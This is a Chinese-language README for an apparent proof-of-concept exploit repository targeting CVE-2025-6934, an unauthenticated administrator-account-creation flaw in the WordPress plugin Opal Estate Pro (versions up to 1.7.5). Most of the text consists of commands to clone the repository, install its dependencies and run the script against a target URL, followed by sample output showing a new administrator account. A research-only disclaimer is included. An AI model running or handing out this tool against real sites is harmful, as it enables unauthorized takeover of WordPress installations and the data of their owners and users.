📖 描述 此仓库包含针对 CVE-2025-6934 的概念验证 (PoC) 漏洞利用代码,该漏洞存在于 WordPress 插件:Opal Estate Pro <= 1.7.5 中,允许 未经身份验证创建管理员账户。
⚠️ 免责声明:此工具仅供 教育和安全研究目的 使用。作者 不承担 任何因滥用或损坏造成的责任。
readme.txt 检测插件版本克隆仓库并安装依赖:
git clone https://github.com/0xgh057r3c0n/CVE-2025-6934.git
cd CVE-2025-6934
pip3 install -r requirements.txt
requirements.txt
requests
beautifulsoup4
colorama
使用目标运行脚本:
python3 CVE-2025-6934.py -u http://target.com/ -mail [email protected] -password MySecurePass123 -user newadmin
✅ 示例输出:
[✔] 漏洞利用成功!
用户名 : newadmin
邮箱 : [email protected]
密码 : MySecurePass123
角色 : administrator

Gaurav Bhattacharjee (0xgh057r3c0n)
本项目采用 MIT 许可证 授权 – 详情请参阅 LICENSE 文件。